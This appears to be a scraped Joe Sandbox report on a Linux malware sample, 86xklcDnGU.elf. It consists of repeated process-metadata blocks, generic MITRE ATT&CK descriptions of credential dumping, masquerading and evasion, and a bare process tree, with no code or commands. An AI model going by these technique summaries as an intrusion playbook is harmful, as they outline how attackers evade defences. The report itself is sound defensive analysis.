MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6254, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Chronological Activities

Analysis Process: 86xklcDnGU.elf PID: 6256, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6258, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6260, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6262, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6264, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6266, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6267, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6270, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6271, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6273, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6276, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6278, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6280, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Analysis Process: 86xklcDnGU.elf PID: 6282, Parent PID: 6231

General

Start time (UTC):	09:00:53
Start date (UTC):	26/05/2024
Path:	/tmp/86xklcDnGU.elf
Arguments:	-
File size:	4379400 bytes
MD5 hash:	7dc1c0e23cd5e102bb12e5c29403410e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report 86xklcDnGU.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Symbols

Network Behavior

System Behavior

Analysis Process: 86xklcDnGU.elf PID: 6223, Parent PID: 6143

General

Chronological Activities

Analysis Process: 86xklcDnGU.elf PID: 6225, Parent PID: 6223

General

Chronological Activities

Analysis Process: sh PID: 6225, Parent PID: 6223

General

Chronological Activities

Analysis Process: sh PID: 6227, Parent PID: 6225

General

Chronological Activities

Analysis Process: rm PID: 6227, Parent PID: 6225

General

Chronological Activities

Analysis Process: sh PID: 6228, Parent PID: 6225

General

Chronological Activities

Analysis Process: mkdir PID: 6228, Parent PID: 6225

General

Chronological Activities

Linux Analysis Report
86xklcDnGU.elf